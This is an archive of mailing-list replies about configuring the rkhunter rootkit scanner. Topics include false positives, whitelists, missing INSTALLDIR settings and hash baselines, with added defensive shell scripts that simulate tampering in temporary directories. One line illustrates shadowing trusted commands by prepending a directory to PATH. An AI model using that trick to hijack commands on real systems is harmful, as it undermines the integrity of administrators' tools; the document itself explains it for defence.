Re: [Rkhunter-users] Rkhunter on rpm based OS

2015-02-28 Thread Helmut Hullen
Hello, absolutely_f...@libero.it,

You wrote on 28.02.15:

> what is your recommended way to install Rkhunter on RPM based OS?

Sorry - what about a quick google search for

rkhunter rpm download

You will find links for several rpm based distributions, e.g. RedHat,
Centos, Fedora, OpenSUSE.

Best regards!
Helmut


___
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users


Re: [Rkhunter-users] Live-CD

2012-06-22 Thread Helmut Hullen
Hello, Laurent,

You wrote on 22.06.12:

>>  >  txz>

> Too bad, sourceforge does not keep track of older source package
> versions.. is that voluntary?

I have some older source packages in my backups ...

But I suppose that John Horne and/or unSpawn have better archives than I  
have.

Best regards!
Helmut



Re: [Rkhunter-users] Live-CD

2012-06-21 Thread Helmut Hullen
Hello, Bernd,

You wrote on 22.06.12:

> Where can i find 1.3.8 ?


My usual source is "slackfind.net", but the site seems to have problems.

My next place:

 

Built by Corrado Franco (http://conraid.net)

Best regards!
Helmut



Re: [Rkhunter-users] Live-CD

2012-06-21 Thread Helmut Hullen
Hello, Bernd,

You wrote on 21.06.12:

> is there a live cd with rootkit hunter ?

That's not impossible but difficult.

"rkhunter" first needs a run

rkhunter --propupd

to generate a file with a kind of checksums, and thereafter it compares
the actual checksums with the data in this file.

A live cd must contain (or at least use) this file.

Best regards!
Helmut



Re: [Rkhunter-users] can not exclude /dev/files

2011-12-18 Thread Helmut Hullen
Hello, Marius,

You wrote on 19.12.11:

> We have a few servers which store the php sessions in /dev/shm
> Although the rkhunter.conf has this line:
> ALLOWDEVFILE="/dev/shm/php_session/*"

> ,I still get a lot of these warnings:

> Warning: Suspicious file types found in /dev:
>   /dev/shm/php_session/f/e/sess_fe336f989061a85113e1ea6517ac1246: ASCII text, with no line terminators

Perhaps

ALLOWDEVFILE="/dev/shm/php_session/*/*/*"

helps.

Best regards!
Helmut

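Whether the deeper pattern is needed can be checked without touching /dev/shm. The following is an added example, not rkhunter's own code: it assumes the whitelist pattern is applied through ordinary shell pathname expansion, where `*` never matches a `/`, builds a throwaway directory tree (constructed sample) with the same layout as the warning above, and counts the files a given set of patterns leaves uncovered. The function names glob_matches and count_unlisted are this example's own.

```sh
#!/bin/sh
# Added example (not rkhunter's own code): shows why the pattern
# ".../php_session/*" cannot cover files nested two directories deeper
# when a whitelist is applied through shell pathname expansion, where
# "*" never matches a "/" character.

# Constructed sample tree mirroring the layout from the warning, built
# under a temporary directory instead of /dev/shm.
ROOT=$(mktemp -d)
trap 'rm -rf "$ROOT"' EXIT
mkdir -p "$ROOT/php_session/f/e"
printf 'data' > "$ROOT/php_session/f/e/sess_fe336f98"
printf 'data' > "$ROOT/php_session/top_level_file"

# glob_matches PATTERN PATH
# Returns 0 if PATH is among the pathname expansion results of PATTERN,
# i.e. the way a whitelist entry would cover it when the pattern is
# expanded by the shell.  PATTERN is deliberately left unquoted.
glob_matches() {
    pattern=$1
    target=$2
    for expanded in $pattern; do
        if [ "$expanded" = "$target" ]; then return 0; fi
    done
    return 1
}

# count_unlisted PATTERN...
# Prints how many regular files under $ROOT are covered by none of the
# given patterns: the files that would still produce a
# "Suspicious file types found in /dev" warning.
count_unlisted() {
    n=0
    for f in $(find "$ROOT" -type f); do
        covered=1
        for pattern in "$@"; do
            if glob_matches "$pattern" "$f"; then covered=0; break; fi
        done
        if [ "$covered" != 0 ]; then n=$((n + 1)); fi
    done
    echo "$n"
}

echo "uncovered with */*/* only: $(count_unlisted "$ROOT/php_session/*/*/*")"
echo "uncovered with both:       $(count_unlisted "$ROOT/php_session/*" "$ROOT/php_session/*/*/*")"
```

With only the original single-level pattern the nested session file stays uncovered; with only the three-level pattern a file directly in php_session would be uncovered instead. Keeping both entries covers both depths for this sample tree.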


Re: [Rkhunter-users] Warning about /usr/sbin/rkhunter file after gentoo updates...

2011-10-16 Thread Helmut Hullen
Hello, Tanstaafl,

You wrote on 21.09.11:

> After a lot of updates on my gentoo system - one of which included a
> REBUILD of rkhunter - and *after* running --propupd, I'm getting the
> following Warning (this is the only one):

> [07:40:01] Warning: The command '/usr/sbin/rkhunter' has
> been replaced and is not a script: /usr/sbin/rkhunter: POSIX shell
> script, ASCII text executable, with very long lines

> Is this a gentoo problem that I need to report there? Or is something
> else going on?

No - it's a widespread problem. See

   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=641217

And in a brand-new slackware installation the problem exists too.

"file-5.07" causes no problems, "file-5.08" and "file-5.09" produce

"Warning: The command '/usr/bin/rkhunter' has been replaced and is not a
script: /usr/bin/rkhunter: POSIX shell script, ASCII text executable"

The path to "rkhunter" may be different.

Best regards!
Helmut



Re: [Rkhunter-users] Xzibit

2011-07-27 Thread Helmut Hullen
Hello, Robert,

You wrote on 27.07.11:

>>>> Just upgraded to 1.3.8 now I'm getting Xzibit Rootkit.  I'm sure
>>>> it is a false positive,  how do I clear this error?

>>> RTKT_FILE_WHITELIST="/etc/rc.d/rc.sysinit:hdparm"


> Sorry to be late to the thread, Running Debian Squeeze and rkhunter
> 1.3.6-4. Also getting the Xzibit Rootkit warning. The problem is that
> there is no /etc/rc.d/rc.sysinit:hdparm file on my system. The
> closest I find is /etc/init.d/hdparm. Would whitelisting this work?

Just take a try!

Best regards!
Helmut



Re: [Rkhunter-users] sshd Rootkit not detected by rkhunter

2011-04-21 Thread Helmut Hullen
Hello, Carlos,

You wrote on 21.04.11:

> I've been affected by a "new" rootkit in Debian Lenny server, but
> rkhunter doesn't detect it.

[...]

> I think a good add-on for rkhunter is to inspect the MD5 of the
> packages. A good test may be to run debsums on debian systems

Sorry - that's the job of the package manager.

Best regards!
Helmut



[Rkhunter-users] Opyum team

2011-02-18 Thread Helmut Hullen
Hello, rkhunter-users,

I've just seen a linux server with the following symptoms:

- in "/var/log/messages" every minute a cron message from "Opyum Team"

- lynx localhost doesn't work; the apache was dead

- restarting the apache works, but the apache dies again after some  
minutes

These problems are about 4 days old.

Searching with "google" for "Opyum rootkit" shows no usable messages.

The server gets rebuilt now; I'll see if there are some other  
footprints.

Best regards!
Helmut



Re: [Rkhunter-users] Run rkhunter on a remote machine

2011-01-10 Thread Helmut Hullen
Hello, Bos,

You wrote on 11.01.11:

> Is there a simple method to unsubscribe?

Surely!
First: avoid HTML and attachments.

Second: look at the end or into the header of some other mail in
this mailing list;
there you can see the URL of the web site where you can modify or stop
your subscription.

Best regards!
Helmut



Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

2010-08-11 Thread Helmut Hullen
Hello, Jonny,

You wrote on 11.08.10:

>>> #BINDIR="/bin /usr/bin /sbin /usr/sbin /usr/local/bin
>>> /usr/local/sbin /usr/libexec /usr/local/libexec"
>>> BINDIR="/usr/sbin"

>> Who has damaged that configuration file? That's not the original
>> one.

[...]

> But that aside as it is not the point, the real point is that there
> seems to be a bug in that I should be able to say to not check any of
> those directories and rkhunter should still at least run, even with
> BINDIR=""

Oh no!
Even "rkhunter" has to trust some programs. And it's a good idea to work
with a defined path in a reliable order. Otherwise I define

PATH=~/my-special/bin:$PATH

and put all my crap into "~/my-special/bin".

Best regards!
Helmut



Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

2010-08-11 Thread Helmut Hullen
Hello, Jonny,

You wrote on 11.08.10:

> OK found it...seems like a bug to me...the default /etc/rkhunter.conf
> has these lines in it
> #
> # Specify the command directories to be checked. This is a
> # space-separated list of directories.
> #
> #BINDIR="/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin
> /usr/libexec /usr/local/libexec"
> BINDIR="/usr/sbin"

Who has damaged that configuration file? That's not the original one.

Best regards!
Helmut



Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

2010-08-11 Thread Helmut Hullen
Hello, Jonny,

You wrote on 11.08.10:

>>> when I try almost any command (except --version) with rkhunter it
>>> gives the error:
>>> The command 'awk' must be present on the system in order to run
>>> rkhunter.

> # echo $PATH
> /sbin:/bin:/usr/sbin:/usr/bin
> I'd like to send the log file but sadly we can't get that far...
> # rkhunter --versioncheck --vl
> The command 'awk' must be present on the system in order to run
> rkhunter.

What does the following show?

ls -l /bin/gawk*

awk -W version

The current GNU awk version is 3.1.8 (or newer).

Best regards!
Helmut



Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

2010-08-10 Thread Helmut Hullen
Hello, Jonny,

You wrote on 10.08.10:

> I'm running
> # rkhunter --version
> Rootkit Hunter 1.3.4

> on gentoo linux hardened 2.6.32

> when I try almost any command (except --version) with rkhunter it
> gives the error:
> The command 'awk' must be present on the system in order to run
> rkhunter.

> searched the web for this error but did not find a solution.

> awk is installed and works:
> # awk --version
> GNU Awk 3.1.6
> # which awk
> /bin/awk
> # ls -l /bin/awk
> lrwxrwxrwx 1 root root 10 Jul 21 15:41 /bin/awk -> gawk-3.1.6

What does the following show?

ls -l /bin/gawk*

awk -W version

The current GNU awk version is 3.1.8 (or newer).

The message results from "check_required_commands", which tests "f" (file
exists) and "x" (file is executable).

Best regards!
Helmut

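The lookup discipline Helmut argues for in the BINDIR message above (trust only a fixed, ordered list of directories, never the caller's $PATH) and the "f"/"x" tests named in this message can be put together in a few lines of shell. This is an added example, not rkhunter's own code: the function names find_trusted and check_required, the trusted directory $DEMO/bin and the fake awk files are this example's own, constructed in a temporary directory.

```sh
#!/bin/sh
# Added example (not rkhunter's own code): resolves the commands a
# scanner depends on only from a fixed, ordered list of directories
# (the role BINDIR plays), never from the caller's $PATH, and applies
# the two tests named in the thread: -f (regular file, following
# symlinks) and -x (executable).

# find_trusted NAME DIRS
# Prints the first DIRS entry (space separated, in order) that holds an
# executable regular file NAME and returns 0; returns 1 otherwise.
# A dangling symlink fails the -f test, so it is not accepted.
find_trusted() {
    name=$1
    dirs=$2
    for d in $dirs; do
        if [ -f "$d/$name" ] && [ -x "$d/$name" ]; then
            echo "$d/$name"
            return 0
        fi
    done
    return 1
}

# check_required NAMES DIRS
# Stops at the first required command that cannot be found in the
# trusted directories.  With DIRS empty nothing can ever be found,
# which is why an empty BINDIR cannot work.
check_required() {
    for name in $1; do
        if ! find_trusted "$name" "$2" >/dev/null; then
            echo "The command '$name' must be present on the system in order to run the scanner."
            return 1
        fi
    done
    return 0
}

# --- constructed demo tree --------------------------------------------
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/bin" "$DEMO/home/bin"
printf '#!/bin/sh\necho real\n' > "$DEMO/bin/gawk-3.1.6"
chmod 755 "$DEMO/bin/gawk-3.1.6"
ln -s gawk-3.1.6 "$DEMO/bin/awk"        # like /bin/awk -> gawk-3.1.6
ln -s gawk-9.9.9 "$DEMO/bin/dangling"   # symlink whose target is missing
printf '#!/bin/sh\necho bogus\n' > "$DEMO/home/bin/awk"   # the "~/my-special/bin" case
chmod 755 "$DEMO/home/bin/awk"

TRUSTED="$DEMO/bin"   # stands in for BINDIR

echo "awk resolves to: $(find_trusted awk "$TRUSTED")"
check_required "awk" "" || echo "(expected failure with an empty directory list)"
```

Even after `PATH=$DEMO/home/bin:$PATH`, `command -v awk` points at the bogus copy while find_trusted still returns the one under the trusted directory; that difference is the whole point of a fixed BINDIR.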


Re: [Rkhunter-users] Warnings after upgrading to Mandriva 2010.1 and rkhunter 1.3.6

2010-07-10 Thread Helmut Hullen
Hello, Chris,

You wrote on 10.07.10:

> After upgrading to Mandriva 2010.1 yesterday I ran rkhunter --propupd
> since I'm sure a lot of files were changed. I still got the usual
> "please check your system as it may be infected" this morning after
> the rkhunter cronjob was ran. I got to looking at the log this
> evening and noticed:

> /usr/sbin/rkhunter[ Warning ]
> Warning: The command '/usr/sbin/rkhunter' has been replaced and is
> not a script: /usr/sbin/rkhunter: a /bin/sh script text executable

Here (Slackware 13, rkhunter 1.3.6)

which -a rkhunter

only shows

/usr/bin/rkhunter

#
ls -l $(which rkhunter)

shows

... root root 425608 29. Nov 2009  /usr/bin/rkhunter

#

file $(which rkhunter)

shows

/usr/bin/rkhunter: POSIX shell script text executable

Maybe the Mandriva package uses another path for "rkhunter": that's no
problem.

> Checking for string 'hdparm'  [ Warning ]

> Warning: Checking for possible rootkit strings[ Warning ]
> Found string 'hdparm' in file '/etc/rc.d/init.d/bootlogd'. Possible
> rootkit: Xzibit Rootkit
> Found string 'hdparm' in file '/etc/rc.d/rc.sysinit'. Possible
> rootkit: Xzibit Rootkit

That's perhaps a false alarm - using "hdparm" in these files is allowed.

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-28 Thread Helmut Hullen
Hello, Duane,

You wrote on 27.05.10:


> [22:55:56] Info: Starting test name 'os_specific'
> [22:55:56]   Checking loaded kernel modules  [ Warning ]
> [22:55:56] Warning: No output found from the lsmod command or the /proc/modules file:

That may be no problem - maybe you run a kernel which loads no module.
You will know.

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-27 Thread Helmut Hullen
Hello, Duane,

You wrote on 27.05.10:

> --- When I enter "which rkhunter" I get /usr/local/bin/rkhunter

Ok.

> The ls -l from /usr/local/bin/ is:

> [r...@ip-208-109-24-147 bin]# ls -l
> total 420
> -rwxr-x--- 1 root root 425606 May 27 08:12 rkhunter

Ok.

> It appears that for some reason Plesk (cron job) inserts a /bin/sh:
> prior to the "rkhunter" command.

What does the following show?

ls -l /bin/sh

What happens if you change the cronjob call to

bash /usr/local/bin/rkhunter

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-27 Thread Helmut Hullen
Hello, Duane,

You wrote on 27.05.10:




> /bin/sh: /usr/bin/rkhunter: No such file or directory

> It will error with no path put in (returns: /bin/sh: rkhunter: No
> such file or directory)

What does the following show?

which rkhunter
ls -l $(which rkhunter)

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-27 Thread Helmut Hullen
Hello, Duane,

You wrote on 27.05.10:


> How do I go about checking the warnings in File Properties?

> If I'm being too "questioning" please just tell me to go pound sand.
> I really appreciate your help (all of you).

Take about 20 minutes to read very slowly (with time to think about it) the
file "/etc/rkhunter.conf". It's really instructive.

And put your tries into "/etc/rkhunter.conf.local".

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-26 Thread Helmut Hullen
Hello, Duane,

You wrote on 26.05.10:

> -rw-r--r--  1 root root 40 May 30  2007 ..1.gz
> -rw-r--r--  1 root root 40 May 30  2007 :.1.gz
> -rw-r--r--  1 root root   3806 May 30  2007 GET.1.gz
> -rw-r--r--  1 root root   3805 May 30  2007 HEAD.1.gz
> lrwxrwxrwx  1 root root  9 Jul 19  2007 Mail.1.gz -> mail.1.gz

If you don't need them: delete them.

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-26 Thread Helmut Hullen
Hello, Duane,

You wrote on 26.05.10:

>  OK .. time for another dumb question.  I seem to have several
>  "rkhunter.conf" files in different locations.  What one is the one I
>  use?

First:

which rkhunter

shows which version of "rkhunter" is used.

locate bin/rkhunter

or

which -a rkhunter

may show additional versions.

Then:

Go to that version which is shown with the first search.

Start your "midnight commander" to take a deep look into the file.
Search for "rkhunter.conf". You will see that the program first searches
"/etc/rkhunter.conf". If there is no such file then it tries
"/usr/local/etc/rkhunter.conf".

Maybe

locate /rkhunter.conf

shows some more places. My traditional way: renaming them all but one  
(in this case: only "/etc/rkhunter.conf" is not renamed), and then I  
start "rkhunter" to see if all works fine.

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-25 Thread Helmut Hullen
Hello, Duane,

You wrote on 25.05.10:

>>> I am pretty sure I have a trojan or resident spoofer in there,

>> Why?

> I have 5 domains on the server.  One of the domains (which is a
> mirror of another domain that runs about 250 Meg / month) is running
> 5 times higher (1.2 Gig so far this month) in "email" traffic /
> bandwidth. Most of it is on the SMTP. It keeps exceeding the limits I
> have imposed.  I know the primary user (a retired Colonel and
> Investment Banker) and he's not sending out spam. However he gets a
> lot of "spoofed" mail using his address in lieu of the actual sender.

"rkhunter" only checks your server for rootkits, it doesn't check TCP/IP
traffic, it doesn't check home directories etc. It's no virus scanner in
the Windows way which scans for Windows viruses.

Perhaps install a classic virus scanner for those examinations
too; "clamav" perhaps helps a bit.

> But at my age, learning is a bit slower than it was in the past.

Are you already a silver surfer (like me)?

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-25 Thread Helmut Hullen
Hello, Duane,

You wrote on 25.05.10:

>>  ./installer.sh --remove


>>   ./installer.sh --install

> The re-install worked!  I have done --propupd and --update and run
> the first scan after making some mods in the rkhunter.conf file.

Fine!


> I am pretty sure I have a trojan or resident spoofer in there,
> especially on one of the domains that has bandwidth / traffic going
> thru the roof.

Maybe "rkhunter" cannot find every piece of crap. It searches for some "well
known" cases, but the other test is whether a file has been changed.

"propupd" produces a hash list of many files, and "rkhunter" compares  
the actual hash with the listed hash. If some rootkit has changed some  
critical file last week then the "propupd" run from yesterday stores the  
infected file "as good".

The best way in this case is reinstalling at least the "base" packages  
or (even better) reinstalling the complete system from CD.

Perhaps you know the tale of "Little Red Riding Hood" (you are using
RedHat, you should know the tale): the girl tries to examine the wolf,
but she fails.

Best regards!
Helmut

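The propupd/compare cycle from the Live-CD message (2012-06-21) and the caveat in this message, that a baseline taken after a file was tampered with records the tampered file as good, can be shown with a few lines of shell. This is an added example, not rkhunter's own code or its data file format: it assumes GNU sha256sum is available, and the file list, the two fake binaries and the tampering step are all constructed in a temporary directory. The function names propupd, check and count_changed are this example's own.

```sh
#!/bin/sh
# Added example (not rkhunter's own code): a minimal file-properties
# baseline in the spirit of "rkhunter --propupd", followed by a compare
# run, plus the failure mode from the thread: re-running propupd after a
# file was altered records the altered file as good.

# propupd LISTFILE DBFILE
# Writes "hash  path" for every existing path named in LISTFILE to
# DBFILE (the baseline), overwriting any previous baseline.
propupd() {
    : > "$2"
    while IFS= read -r path; do
        if [ -f "$path" ]; then sha256sum "$path" >> "$2"; fi
    done < "$1"
}

# check DBFILE
# Recomputes each hash in DBFILE and prints one line per path whose
# current hash differs or that is missing.  Prints nothing when all match.
check() {
    while read -r hash path; do
        if [ ! -f "$path" ]; then
            echo "$path: missing"
        elif [ "$(sha256sum "$path" | cut -d' ' -f1)" != "$hash" ]; then
            echo "$path: hash changed"
        fi
    done < "$1"
}

# count_changed DBFILE -> number of lines reported by check
count_changed() { check "$1" | wc -l | tr -d ' '; }

# --- constructed demo -------------------------------------------------
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/bin"
printf 'original ls\n' > "$DEMO/bin/ls"
printf 'original ps\n' > "$DEMO/bin/ps"
printf '%s\n' "$DEMO/bin/ls" "$DEMO/bin/ps" > "$DEMO/filelist"

propupd "$DEMO/filelist" "$DEMO/rkhunter.dat"    # clean baseline
printf 'trojaned ps\n' > "$DEMO/bin/ps"           # simulated tampering

# Scenario 1: compare against the clean baseline -> the change is reported.
FIRST_REPORT=$(check "$DEMO/rkhunter.dat")

# Scenario 2: propupd re-run AFTER the change -> the tampered ps is now
# the reference hash and the compare run stays silent.
propupd "$DEMO/filelist" "$DEMO/rkhunter.dat"
SECOND_REPORT=$(check "$DEMO/rkhunter.dat")

echo "after clean baseline:   ${FIRST_REPORT:-(nothing)}"
echo "after tainted baseline: ${SECOND_REPORT:-(nothing)}"
```

This is exactly why the message recommends reinstalling the base packages rather than trusting a baseline whose age is unknown: the compare run can only ever be as good as the state the last propupd captured.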


Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-25 Thread Helmut Hullen
Hello, Duane,

You wrote on 25.05.10:

>> bash -x rkhunter --propupd 2>/tmp/rkh.log

> + get_installdir_option
> ++ get_option 1 single INSTALLDIR
> ++ OPTTYPE=1
> ++ OPTMULTI=single
> ++ OPTV=INSTALLDIR
> +++ grep -h '^INSTALLDIR=' /usr/local/etc/rkhunter.conf
> ++ '[' -z '' ']'
> ++ echo ''
> ++ return 0
> + RKHINSTALLDIR=
> + '[' -z '' ']'
> + echo 'Invalid INSTALLDIR configuration option - no installation
> directory specified.'
> + exit 1

I've just seen that your system now runs. In the above debug lines you
can see that "rkhunter" has searched for "INSTALLDIR" in
"/usr/local/etc/rkhunter.conf" and couldn't find such an entry.

Now it works - that's fine!

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-25 Thread Helmut Hullen
Hello, Duane,

You wrote on 25.05.10:

> I installed from the tarball (rkhunter-1.3.6.tar.gz)

> Is this "staying in the thread"?

Splendid!

But for the error:

bash -x rkhunter --propupd 2>/tmp/rkh.log

And then look in "/tmp/rkh.log" for "get_installdir_option" (until  
"get_rootdir_option").

In my case some lines before "return" I see

RKHINSTALLDIR=/usr

(as in "/etc/rkhunter.conf": "INSTALLDIR=/usr")

(By the way: don't top-post ...)

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-25 Thread Helmut Hullen
Hello, Duane,

You wrote on 25.05.10:

> 1.  John Horne says: It hasn't installed properly, try re-installing.
> The INSTALLDIR option must exist for RKH to run.

> Is there any guidance on re-installing?  Obviously, whatever I did to
> initially "install" wasn't very successful.

What have you tried:

installing from the tarball (rkhunter-version.tar.gz)
or
installing a Fedora *.rpm

>  - do I need to uninstall first?  If so how.

"That depends" ...

> 2.  Have I been successful in eliminating HTML from this email?

Yes - delightful!

> 3.  How do I reply and keep this in the thread.  Helmut Hullen points
> out that I was not, "Please keep the traffic in the mailing list -
> thank you."

And again: delightful!
(..fully? Please excuse my gerlish)

Best regards!
Helmut



Re: [Rkhunter-users] Intallation Error (INSTALLDIR)

2010-05-25 Thread Helmut Hullen
Hello, John,

You wrote on 25.05.10:

>> By the way - you (or some other instructed person) should update the
>> "Tested on" list on
>>
>> http://www.rootkit.nl/projects/rootkit_hunter.html
>>
>>

> That is not the official RKH web site. (It is the old one, so not for
> us to maintain.)

Is that now the official web site?

http://sourceforge.net/apps/trac/rkhunter/wiki/SPRKH

The English Wikipedia shows it on

http://en.wikipedia.org/wiki/Rkhunter

Best regards!
Helmut



Re: [Rkhunter-users] Intallation Error (INSTALLDIR)

2010-05-25 Thread Helmut Hullen
Hello, John,

You wrote on 25.05.10:

>> I've installed rkhunter on my virtual server (RedHat Fedora Core 6)

> FC6 is very old, and unsupported you realise.

By the way - you (or some other instructed person) should update the  
"Tested on" list on

http://www.rootkit.nl/projects/rootkit_hunter.html


Best regards!
Helmut



Re: [Rkhunter-users] rkhunter/cron Red Hat Fedora Core 6 - ooops

2010-05-25 Thread Helmut Hullen
Hello, Duane,

You wrote on 24.05.10 on the subject Re: [Rkhunter-users] rkhunter/cron Red Hat
Fedora Core 6 - ooops:

> I've been successful in getting rkhunter installed and permissions
> and symlinks working.

> But the issue of the INSTALLDIR error remains.

> "[r...@ip-208-109-24-147 ~]# rkhunter --update
> Invalid INSTALLDIR configuration option - no installation directory
> specified."

> INSTALLDIR is not in the rkhunter.conf file.

Please keep the traffic in the mailing list - thank you!

Look into the script "rkhunter" (may be in "/usr/bin"), search for  
"RKHINSTALLDIR".

There you find that "INSTALLDIR" has to be set from the installer  
script.

In my installation (slackware) I find "INSTALLDIR=/usr" at the end of
"/etc/rkhunter.conf".

Best regards!
Helmut

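The configuration lookup order from the 2010-05-26 message (/etc/rkhunter.conf first, then /usr/local/etc/rkhunter.conf) and the INSTALLDIR check whose failure appears in the bash -x trace of 2010-05-25 and again in this message, written out as an added example. This is not rkhunter's own code: the search order and the grep -h '^INSTALLDIR=' lookup follow what the messages show, the prefix argument and the function names find_config, get_option and resolve_installdir are this example's own, and the two configuration trees are constructed in a temporary directory.

```sh
#!/bin/sh
# Added example (not rkhunter's own code): picks the configuration file
# in the order /etc/rkhunter.conf, then /usr/local/etc/rkhunter.conf,
# and reads a single-valued option from it the way the bash -x trace in
# the thread shows (grep -h '^INSTALLDIR=').  A PREFIX argument lets the
# demo run against a constructed tree instead of the real /etc.

# find_config PREFIX
# Prints the first existing file among PREFIX/etc/rkhunter.conf and
# PREFIX/usr/local/etc/rkhunter.conf; returns 1 if neither exists.
find_config() {
    for c in "$1/etc/rkhunter.conf" "$1/usr/local/etc/rkhunter.conf"; do
        if [ -f "$c" ]; then echo "$c"; return 0; fi
    done
    return 1
}

# get_option NAME CONFIG
# Prints the value of NAME=value from CONFIG (last occurrence wins);
# prints an empty string when the option is absent.
get_option() {
    grep -h "^$1=" "$2" | tail -n 1 | sed "s/^$1=//"
}

# resolve_installdir PREFIX
# Emulates the startup check: prints the installation directory, or the
# error message quoted in the thread and returns 1 when the option is
# missing from whichever configuration file was selected.
resolve_installdir() {
    cfg=$(find_config "$1") || { echo "no rkhunter.conf found"; return 1; }
    dir=$(get_option INSTALLDIR "$cfg")
    if [ -z "$dir" ]; then
        echo "Invalid INSTALLDIR configuration option - no installation directory specified."
        return 1
    fi
    echo "$dir"
}

# --- constructed demo trees -------------------------------------------
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
# Tree A: only /usr/local/etc/rkhunter.conf, and it lacks INSTALLDIR
# (the situation visible in the bash -x trace).
mkdir -p "$DEMO/a/usr/local/etc"
printf 'MAILTO=root\n' > "$DEMO/a/usr/local/etc/rkhunter.conf"
# Tree B: /etc/rkhunter.conf carrying INSTALLDIR=/usr at the end, as
# described for the Slackware install, plus a /usr/local copy that must
# be ignored because /etc wins.
mkdir -p "$DEMO/b/etc" "$DEMO/b/usr/local/etc"
printf 'MAILTO=root\nINSTALLDIR=/usr\n' > "$DEMO/b/etc/rkhunter.conf"
printf 'INSTALLDIR=/opt/other\n' > "$DEMO/b/usr/local/etc/rkhunter.conf"

echo "tree A: $(resolve_installdir "$DEMO/a")"
echo "tree B: $(resolve_installdir "$DEMO/b")"
```

Tree A reproduces the error message from the thread, tree B resolves to /usr; a stray second configuration file, as in the "several rkhunter.conf files" question, is simply never consulted once /etc/rkhunter.conf exists.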


Re: [Rkhunter-users] rkhunter/cron Red Hat Fedora Core 6 - ooops

2010-05-25 Thread Helmut Hullen
Hello, Mike,

You wrote on 25.05.10 on the subject Re: [Rkhunter-users] rkhunter/cron Red Hat
Fedora Core 6 - ooops:

>>> I tried to install rkhunter on my Redhat Fedora Core 6 virtual
>>> server (GoDaddy). But what I get for email notification is:

>> That's a very ancient version, nearly 4 years old. Please try a
>> newer one, perhaps fedora 11 or 12.

> Well! I have FC2.

> The version of Fedora shouldn't matter.

Please keep the traffic in the mailing list - thank you.

Have you installed an *.rpm package, or have you installed "from scratch"
with the "installer.sh" script?

Best regards!
Helmut



Re: [Rkhunter-users] rkhunter/cron Red Hat Fedora Core 6 - ooops

2010-05-24 Thread Helmut Hullen
Hello, Duane,

You wrote on 24.05.10:

> I tried to install rkhunter on my Redhat Fedora Core 6 virtual server
> (GoDaddy). But what I get for email notification is:

That's a very ancient version, nearly 4 years old. Please try a newer  
one, perhaps fedora 11 or 12.

Best regards!
Helmut



Re: [Rkhunter-users] Warnings after update from 1.3.4 to 1.3.6

2010-05-19 Thread Helmut Hullen
Hello, Tanstaafl,

You wrote on 19.05.10:

> Ooops - now I need the 1.3.4 version, and can't find it on the
> sourceforge site:


ftp://hullen.hopto.org/rkhunter-1.3.4-noarch-1cf.tgz

It's an ancient tarball.
I prefer to unpack such a package with the "midnight commander", just
pressing the "enter" key. Then it's self-explanatory ...

The machine is offline from 20 o'clock to 5 o'clock UTC. You have more  
than 5 hours from now!

Best regards!
Helmut



Re: [Rkhunter-users] Warnings after update from 1.3.4 to 1.3.6

2010-05-19 Thread Helmut Hullen
Hello, Tanstaafl,

You wrote on 19.05.10:

>> All you have to do is run RKH with the debug option. Something like:
>>
>> rkhunter --debug --enable properties
>>
>> This should create a file in the /tmp directory, it may be fairly
>> large. If you send me (not the list) both files, then I can take a
>> look.

> Sorry, should have been clearer...

> I googled how to do that, but what I balked at was installing both
> versions side by side...

It's quite simple!

Look for the file "/usr/bin/rkhunter" - it's a pure shellscript (nearly  
human readable, for some kind of humans).

rkhunter -V

tells you the actual version.

If you first copy your current version to "rkhunter-1.3.6" (if that's  
the version), then you can copy the older version into "/usr/bin" too,  
get that version and rename it too.

And then you call

rkhunter-1.3.4 --debug --enable properties
rkhunter-1.3.6 --debug --enable properties

You get 2 files /tmp/rkhunter-debug.xyz (with different characters after  
the dot); send them to John Horne.

Finally you copy your favorite version back to "rkhunter".

Best regards!
Helmut



Re: [Rkhunter-users] Warnings after update from 1.3.4 to 1.3.6

2010-05-16 Thread Helmut Hullen
Hello, Tanstaafl,

You wrote on 16.05.10:

> [03:11:58] Warning: Checking for possible rootkit strings [ Warning ]
> [03:11:58]  Found string 'hdparm' in file '/etc/init.d/hdparm'. Possible rootkit: Xzibit Rootkit
> [03:11:58]  Found string 'hdparm' in file '/etc/init.d/pciparm'. Possible rootkit: Xzibit Rootkit

>> The 'hdparm' one is possibly a false-positive, but that's for you to
>> check.

> Ok, well, I examined the two scripts, and didn't see anything unusual
> about them... but I'm not a forensics expert, just a lowly admin
> wanna-be... any other suggestions/pointers?

See the thread "rcs files", just a week old.

I had solved the "Xzibit" warnings with

RTKT_FILE_WHITELIST=/etc/init.d/boot.local
# because of Xzibit

etc.

Best regards!
Helmut

